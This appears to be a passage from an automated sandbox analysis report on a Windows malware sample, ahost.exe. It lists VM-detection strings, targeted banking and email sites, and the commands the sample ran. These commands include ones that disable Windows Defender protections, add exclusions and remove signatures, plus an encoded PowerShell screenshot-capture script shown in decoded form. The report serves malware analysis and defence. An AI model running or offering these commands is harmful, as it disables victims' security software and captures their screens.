Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: getmac.exe, 00000050.00000002.1620437806.0000015C23811000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618837674.0000015C2380E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f8vmware
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: getmac.exe, 00000050.00000002.1620437806.0000015C23811000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618837674.0000015C2380E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \|f4vmusrvc
Source: svchost.exe, 00000015.00000002.2643755689.0000021781E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ahost.exe

Code function: 0_2_00007FF7F91ED19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7F91ED19C

Source: C:\Users\user\Desktop\ahost.exe

Code function: 0_2_00007FF7F92034F0 GetProcessHeap,

0_2_00007FF7F92034F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91ED19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7F91ED19C
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91ED37C SetUnhandledExceptionFilter,	0_2_00007FF7F91ED37C
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91FA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7F91FA684
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91EC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7F91EC910
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91ED19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF7F91ED19C
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91ED37C SetUnhandledExceptionFilter,	2_2_00007FF7F91ED37C
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91FA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF7F91FA684
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8E4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	104_2_00007FF7CF8E4C10
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8DB6D8 SetUnhandledExceptionFilter,	104_2_00007FF7CF8DB6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8DA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	104_2_00007FF7CF8DA66C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8DB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	104_2_00007FF7CF8DB52C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\ahost.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Users\user\Desktop\ahost.exe "C:\Users\user\Desktop\ahost.exe"	Jump to behavior
